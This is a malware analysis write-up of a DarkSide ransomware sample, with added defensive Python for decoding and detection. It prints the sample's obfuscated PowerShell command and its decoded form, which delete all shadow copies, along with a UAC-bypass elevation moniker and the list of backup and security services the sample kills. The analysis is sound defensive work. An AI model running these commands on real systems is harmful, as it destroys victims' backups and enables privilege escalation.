
When the Hacker is Hacked!

DarkSide is a ransomware threat that has been in operation since at least August 2020 and was used in a cyberattack against Georgia-based Colonial Pipeline, leading to a significant fuel supply disruption along the East Coast of the US.

The malware is offered as Ransomware as a Service (RaaS) to different cybercriminals through an affiliate program. Like other prolific ransomware threats, it employs double extortion that combines file encryption with data theft, and it is deployed on compromised networks using manual hacking techniques.

Based on the initial analysis, the threat actors behind DarkSide ransomware were identified as being of Russian origin and are likely former affiliates of the REvil RaaS group.

Like any other well-constructed ransomware, DarkSide removes itself from the infected machine completely, so collecting its live samples was a little tricky. Still, using open/semi-open (deep web) threat sources and using techniques like self-deployed web-facing honeypots, I was able to collect 37 live samples of different variants of DarkSide ransomware. Unfortunately, some of them are still semi-detected or undetected by over 50 antivirus engines as of 05.15.2021.

The project was initiated using a “Blind Study” methodology, and one sample was selected. Details of the sample are below:

  • Filename: FlashUpdate.exe
  • Size: 2 MiB (2147296 bytes)
  • Type: “peexe” executable
  • Compression: UPX
  • Description: PE32 executable (GUI) Intel 80386, for MS Windows
  • Architecture: WINDOWS
  • HASH: SHA256: bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408

These days, every sophisticated ransomware family has several security evasion techniques to bypass detection, so many of the defenses commonly recommended would be ineffective. Some of those techniques are:

1. Anti-Virtualization – A mechanism that prevents the ransomware from executing if it detects that it is running in a virtual environment. The ransomware does this using various techniques; one of the most common is to read the MAC address of the network interface card, which discloses whether the system is virtual or physical.

2. Encrypted Source Code – Encrypting the source code and decoding it directly in the memory for execution.

3. Dynamic process calls and API hooking are other techniques used for the same purpose.

Here, to make static analysis harder, DarkSide resolves DLLs and API calls dynamically using LoadLibrary, GetProcAddress, and two custom functions shown below. For example, in this screenshot, the address of _wcsicmp is resolved in memory.

The mutex (a named synchronization object) “Global\\3e93e49583d6401ba148cd68d1f84af7” is created to make sure only one copy of the ransomware is running; otherwise, the ransomware exits. The name is derived from the name of the executable. Then “SetThreadExecutionState” is called to keep the system awake by resetting the system idle timer. This is required so that the files can still be encrypted even when the system would otherwise enter sleep / idle mode.

To ensure certain services are not running, the following services are stopped using the “ControlService – SERVICE_CONTROL_STOP” command and the “DeleteService” command. However, deleting a service is not helpful if an organization pays the ransom and wants to go back into production quickly. So DarkSide only stops them but keeps monitoring their status using a mutex so that the affected organization can't start them manually.

This is an interesting piece; to conduct all the work (like stopping services, encrypting files, deleting critical system data, etc.), DarkSide needs to get an elevated privilege (if executed by a USER, not an ADMINISTRATOR).

To achieve this, DarkSide uses an exploit technique created and used by the CIA (as per WikiLeaks, part of their “Vault 7: CIA Hacking Tools Revealed” leaks) known as “Elevated COM Object UAC Bypass.”

The command used is:

“Elevation:Administrator!new:%s”

It takes ADMIN tokens from an administrative program and utilizes them for privilege escalation.

Shadow Copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes.

Using “CreateProcessW”, the following PowerShell script is executed, which deletes Shadow Volume Copies.

"powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\""

The extracted command is obfuscated. After deobfuscating it, I can see that this PowerShell command is used to delete Shadow Volume Copies on the machine before it is encrypted.

“Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}”
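To reproduce the deobfuscation step from the analyst's side, the following Python (an added example, not code from the original post) pulls the hex literal and the loop bounds out of the wrapped command, rebuilds the string exactly as the `(0..61)` loop does, and flags whether the result deletes shadow copies. The command string is a constructed copy of the one quoted above.

```python
import re

# Constructed copy of the obfuscated command quoted in the analysis above
# (outer quotes are the ones passed to CreateProcessW).
OBFUSCATED_CMD = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'"
    "4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20"
    "'.Substring(2*$_,2))};iex $s\""
)

# '0x'+'<hex>'.Substring(2*$_,2): two hex digits per loop iteration.
HEX_LITERAL = re.compile(r"'0x'\+'([0-9A-Fa-f]+)'\.Substring\(2\*\$_,2\)")
# (lo..hi) PowerShell range that drives the loop.
LOOP_RANGE = re.compile(r"\((\d+)\.\.(\d+)\)")


def deobfuscate(cmd: str) -> str:
    """Recover the PowerShell code built by the hex-to-char loop."""
    lit = HEX_LITERAL.search(cmd)
    rng = LOOP_RANGE.search(cmd)
    if not lit or not rng:
        raise ValueError("command does not match the (lo..hi) hex-slice pattern")
    hexstr = lit.group(1)
    lo, hi = (int(x) for x in rng.groups())
    # The loop only consumes bytes lo..hi, so honour the range rather than
    # decoding the whole literal (a shorter range would silently truncate).
    return bytes.fromhex(hexstr[2 * lo : 2 * (hi + 1)]).decode("ascii")


def deletes_shadow_copies(ps: str) -> bool:
    """Heuristic: WMI Win32_Shadowcopy enumeration combined with a Delete() call."""
    low = ps.lower()
    return "win32_shadowcopy" in low and ".delete(" in low


if __name__ == "__main__":
    decoded = deobfuscate(OBFUSCATED_CMD)
    print(decoded)
    print("shadow copy deletion:", deletes_shadow_copies(decoded))
```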

An .ICO file is dropped in the “%APPDATA%” directory, and a registry key is created.

All the running services of the system are enumerated and matched against this hardcoded service list inside DarkSide ransomware:

  • VSS
  • SQL
  • svc$
  • memtas
  • mepocs
  • Sophos
  • veeam
  • backup

If any of these services are identified as running, they are terminated and deleted.
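From the defender's side, the substring list above is a useful detection signal: a burst of stops across services matching these keywords within a few seconds is not how administrators normally operate. The Python below is an added example (not from the original post) that runs that check over constructed, simplified Service Control Manager stop events; the line format is an assumption modelled loosely on Event ID 7036, not the real log layout.

```python
import re
from datetime import datetime, timedelta

# Substrings hardcoded in the DarkSide sample (the list above), lower-cased for matching.
TARGET_KEYWORDS = ("vss", "sql", "svc$", "memtas", "mepocs", "sophos", "veeam", "backup")

# Constructed sample events; the "service=<name> state=stopped" layout is an
# assumption for this example, not the real Event ID 7036 message text.
SAMPLE_EVENTS = """\
2021-05-15T10:02:11 7036 service=Spooler state=stopped
2021-05-15T10:02:13 7036 service=VSS state=stopped
2021-05-15T10:02:13 7036 service=MSSQLSERVER state=stopped
2021-05-15T10:02:14 7036 service=VeeamBackupSvc state=stopped
2021-05-15T10:02:14 7036 service=Sophos Endpoint Defense Service state=stopped
2021-05-15T10:45:00 7036 service=wuauserv state=stopped
"""

EVENT_RE = re.compile(r"^(\S+) 7036 service=(.+?) state=stopped$")


def is_targeted(service_name: str) -> bool:
    """True if the name contains any substring DarkSide looks for (case-insensitive)."""
    low = service_name.lower()
    return any(k in low for k in TARGET_KEYWORDS)


def parse_stops(text: str):
    """Yield (timestamp, service name) for every stop event in the sample."""
    stops = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            stops.append((datetime.fromisoformat(m.group(1)), m.group(2)))
    return stops


def detect_mass_service_stop(text: str, window_seconds: int = 60, min_hits: int = 3):
    """Alert when >= min_hits distinct targeted services stop inside one window."""
    targeted = sorted((ts, n) for ts, n in parse_stops(text) if is_targeted(n))
    window = timedelta(seconds=window_seconds)
    for i, (start, _) in enumerate(targeted):
        names = {n for ts, n in targeted[i:] if ts - start <= window}
        if len(names) >= min_hits:
            return [(start, sorted(names))]  # first burst is enough here
    return []
```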

In this stage, all the drives of the infected system are enumerated, and their types are identified. DarkSide conducts this enumeration using “_GetDriveTypeW”, “_GetFreeDiskSpaceW” and “drive_type_code” calls. The format of the output is “<Drive Name>:<Remaining Disk Space>/<Total Disk Space>.” For example, “C:30/50.”

The encryption mechanism consists of two major parts, which are the exclusions and the actual encryption routines. DarkSide excludes a couple of file directories. Some of them are:

The file encryption routine architecture is like this:

DarkSide is a C&C (command and control) based ransomware. That means it needs a constant internet connection for downloading execution dependencies, syncing the public and private encryption keys, and other similar tasks. Also, as it is part of a RaaS, it registers its victim with a unique identity so that the hacker can identify them in a list of victims.

Ransomware usually does this in the form of a unique URL counterpart generation process, and that counterpart will be the unique victim identifier. For example, “www.abc.com/sd33kshdysteclsp”. Here abc.com would be the C&C domain operated by the hacker, and “sd33kshdysteclsp” would be the unique victim identifier.

DarkSide follows the same process. After reverse-engineering the ransomware, a couple of important pieces of information were extracted. I was able to identify the C&C server domains, but they are excluded from this report because if accessed they can distribute ransomware or Trojan downloaders.

The format of the unique victim identifier generation process is DOMAIN/<URL Path Generator>.

1. Email address identified: breathcojunktab1987@yahoo[.]com.

2. Contains PDB path: %USERPROFILE%\code\Squirrel\Squirrel.Windows\src\StubExecutable\bin\Release\StubExecutable.pdb

3. Public IPs identified:
   i. 185.105.109.19
   ii. 23.55.62.35

4. Program digital certificate details: After extracting and analyzing the digital certificate, the following information was extracted:

Conclusion

Ransomware-as-a-service democratizes ransomware attacks so that even unsophisticated bad actors can shut a business down. Even worse, many of the recommendations that we are seeing in the media for protecting a company from ransomware would not be effective based on the above. Updating your anti-virus is not enough.